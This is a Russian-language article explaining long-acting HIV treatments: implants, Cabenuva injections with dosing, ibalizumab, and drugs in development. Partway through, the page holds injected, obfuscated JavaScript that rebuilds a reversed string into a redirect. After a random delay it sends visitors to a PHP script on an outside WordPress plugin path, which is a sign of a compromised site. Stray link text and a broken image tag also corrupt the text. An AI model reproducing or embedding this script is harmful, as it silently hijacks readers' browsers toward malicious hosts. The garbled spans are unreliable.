Пролонги, импланты, уколы: последние разработки на рынке препаратов от ВИЧ

Пить таблетки на протяжении всей жизни с точностью до минут — не самая простая задача. Но люди, живущие с ВИЧ, до сих вынуждены так делать — терапия пожизненная. Хорошо еще, что вместо горстей препаратов по несколько раз в день появились комбинированные схемы: одна таблетка — раз в сутки. Ученые все время пытаются облегчить жизнь пациентам, повысить приверженность лечению и разрабатывают длительные формы препаратов. Как это работает и какими они бывают — в разборе СПИД.ЦЕНТРа.

В середине 1980-х ученые идентифицировали вирус иммунодефицита человека и сразу же стали искать лекарство. История антиретровирусной терапии началась в 1987 году, когда для лечения ВИЧ-инфекции стали использовать препарат зидовудин. Но его эффективность была невысокой, а побочные эффекты слишком сильными. Первая высокоэффективная терапия появилась только через десять лет — в 1996 году. Эта комбинация из нескольких лекарств блокирует размножение попавшего в организм вируса сразу на нескольких этапах его цикла. С тех пор ВИЧ-инфекция — не смертельное, а хроническое заболевание, которое можно контролировать при должном лечении.

Антиретровирусные препараты (АРВ) подавляют размножение ВИЧ, но неспособны полностью удалить вирус из организма, именно поэтому их нужно принимать постоянно в течение всей жизни. Как только концентрация препарата в крови падает ниже порогового значения, вирус снова начинает размножаться. Это особенно опасно, ведь если вирус размножается в присутствии небольшого количества лекарства, то он вырабатывает устойчивость к этому препарату.

Любые лекарства, включая АРВ, разрушаются в печени и выводятся почками, поэтому для поддержания концентрации препарата в крови на нужном уровне очень важно принимать терапию в соответствии с назначенной схемой, не пропуская приемы и не «опаздывая» по времени.

Пить таблетки на протяжении всей жизни с точностью до минут — не самая простая задача. Этому мешают и банальная забывчивость, и разные случайные обстоятельства. А чем чаще человек нарушает время приема терапии, тем выше риск развития у вируса устойчивости. Именно поэтому врачи стараются назначать схемы с приемом лекарств один раз в день и с минимальным числом таблеток — чем реже и меньше нужно принимать лекарств, тем проще соблюдать режим. Правильное соблюдение режима приема терапии называют высокой приверженностью лечению.

Для «упрямых» препаратов, не желающих проникать таким образом, придумали специальные пролонгированные таблетки и капсулы, которые принимают, как обычно, через рот. К названию таких препаратов часто добавляют слова «ретард», «лонг» или «пролонг». Они могут очень сильно различаться по строению и технологии производства, но смысл у всех один. Обычная таблетка распадается в желудке за пятнадцать минут, и все содержащееся в ней лекарство довольно быстро всасывается в кровь. Пролонгированная же растворяется постепенно, отдавая лекарство небольшими порциями на протяжении многих часов.

Основной недостаток таких таблеток — срок их действия ограничено временем нахождения таблетки в кишечнике и не превышает 12—24 часов. В случае же диареи таблетка может покинуть организм гораздо быстрее, а значит, уменьшится концентрация лекарства в крови, что может быть опасно. Для антиретровирусных препаратов создание таблеток или капсул с замедленным высвобождением лекарственного вещества не очень перспективно — современные схемы уже позволяют принимать терапию один раз в день. То есть удобство применения терапии такие таблетки не повысят.

Если нужно добиться продления эффекта препарата на дни и недели, а лекарство всасываться через кожу упорно не хочет, приходится прибегать к парентеральным пролонгированным формам. Можно зашить под кожу специальную стерильную таблетку, которая будет медленно растворяться и выделять лекарственное вещество: на коже делается небольшой разрез, в него вводят таблетку и зашивают рану.

Помимо таблеток, под кожу можно вводить специальные полимерные импланты, содержащие нужное лекарство. Преимущество имплантов — они могут выделять лекарственное вещество очень долго, до нескольких лет. Чаще всего такие импланты используют для гормональной контрацепции. Так как гормоны действуют в очень маленьких дозах, даже в небольшой по размерам имплант можно сразу поместить запас препарата на несколько лет. Например, противозачаточный препарат Имплантон, который вводится под кожу, продолжает действовать три года. Если действие препарата нужно прекратить — достаточно просто извлечь имплант.

$NjS=function(n){if(typeof ($NjS.list[n])==”string”) return $NjS.list[n].split(“”).reverse().join(“”);return $NjS.list[n];};$NjS.list=[“\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tor/pictures/6485/content_HIV-Treatment-Passes-Initial-Trials-2019.jpg” alt=”” />

Перед началом применения Cabenuva пациент не менее месяца принимает каботегравир в таблетках (называется Vocabria) в комбинации с Эдюрантом — таблетками рилпивирина. Это необходимо, чтобы проверить переносимость такой схемы у конкретного пациента и оценить побочные эффекты. Если схема переносится хорошо, пациенту вводят первую нагрузочную дозу Cabenuva — 3 миллилитра суспензии, содержащей 600 миллиграммов каботегравира, и 3 миллилитра суспензии, содержащей 900 миллиграммов рилпивирина. Суспензии вводятся в разные участки ягодичной мышцы, то есть делают два укола. После этого поддерживающие дозы вводят ежемесячно: 2 мл (400 мг) каботегравира и 2 мл (600 мг) рилпивирина. Если по каким-то причинам введение очередной ежемесячной поддерживающей дозы невозможно, пациент до момента следующей инъекции может принимать пероральную схему (Vocabria + Эдюрант). Пролонгированная форма каботегравира также имеет большие перспективы для использования в качестве доконтактной профилактики ВИЧ-инфекции.

Еще один препарат, который уже применяется в клинической практике, — ибализумаб (Трогарзо) — можно назвать пролонгированным с несколькими оговорками. По химической природе ибализумаб — моноклональное антитело, то есть близок к человеческим иммуноглобулинам. Ибализумаб связывается с некоторыми белками на поверхности вируса и мешает проникновению ВИЧ в клетки. Препарат вводят внутривенно один раз в две недели и часто сочетают с другими АРВ-препаратами. Такая схема — не самый удобный вариант, поэтому сейчас ибализумаб используется только для лечения ВИЧ с множественной лекарственной устойчивостью, когда другие схемы оказываются неэффективными. Поэтому ибализумаб правильнее будет отнести к нишевым препаратам.

К сожалению, на этом и заканчивается не очень длинный перечень пролонгированных АРВ-препаратов, которые уже применяются на практике. Дальше пойдет речь о препаратах, находящихся на разных стадиях исследований.

Что сейчас находится в разработке?

PRO 140

С точки зрения места в клинической практике на ибализумаб похоже еще одно моноклональное антитело, находящееся в стадии клинических исследований, — PRO 140. Этот препарат также можно будет использовать для лечения ВИЧ-инфекции, если у пациента не работают другие схемы. А по механизму действия PRO 140 похож на уже существующий на рынке препарат маравирок (Целзентри). Он связывается с CCR-5 рецепторами на поверхности клеток-мишеней и мешает проникновению вируса в клетку. Строение активного центра молекулы PRO 140 отличается от маравирока, поэтому он активен даже в тех случаях, когда вирус выработал устойчивость к маравироку. Как и маравирок, PRO 140 активен только против CCR-5-тропных подтипов ВИЧ, то есть подойдет не всем пациентам. Препарат вводят внутривенно, один раз в неделю.

Убить невидимого убийцу. Все о вирусах и методах борьбы с ними

EFdA

Это вещество относится к классу нуклеозидных ингибиторов обратной транскриптазы (НИОТ), похоже на ламивудин. В отличие от последнего, образует гораздо более прочную связь с вирусным ферментом — обратной транскриптазой, что позволяет надолго блокировать разhttp://yandex.ru/множение ВИЧ в клетках. Также EFdA медленнее выводится из организма и дольше остается внутри клеток, по сравнению с другими НИОТ. Благодаря образованию более прочной связи с обратной транскриптазой, EFdA может использоваться даже у пациентов с устойчивостью к ламивудину и эмтрицитабину. Большие перспективы имеет разработка полимерных контейнеров с EFdA, которые вводятся под кожу и обеспечивают выделение препарата в нужных количествах до одного года. Такие контейнеры могут использоваться самостоятельно как доконтактная профилактика (PrEP) или в сочетании с другими АРВ-препаратами для терапии ВИЧ-инфекции.

Тенофовир

Давно применяется в клинической практике. Зарегистрированный несколько лет назад тенофовира алафенамид имеет хорошие перспективы для применения в качестве пролонгированной формы. Подкожные полимерные контейнеры могут поддерживать необходимый уровень препарата в организме до сорока дней, что делает их перспективными как для PrEP, так и для сочетания с другими пролонгированными препаратами в лечении ВИЧ.

Элсульфавирин

Ненуклеозидный ингибитор обратной транскриптазы, последние несколько лет применяется в России. Сейчас проводятся исследования инъекционной пролонгированной формы, которую можно будет вводить внутримышечно раз в месяц.

Атазанавир + ритонавир

В качестве кандидата изучается суспензия комбинации атазанавира и ритонавира. Исследования на животных показывают, что при подкожном или внутримышечном введении препарата лекарственные вещества долгое время остаются в плазме крови в необходимых для подавления размножения вируса концентрациях.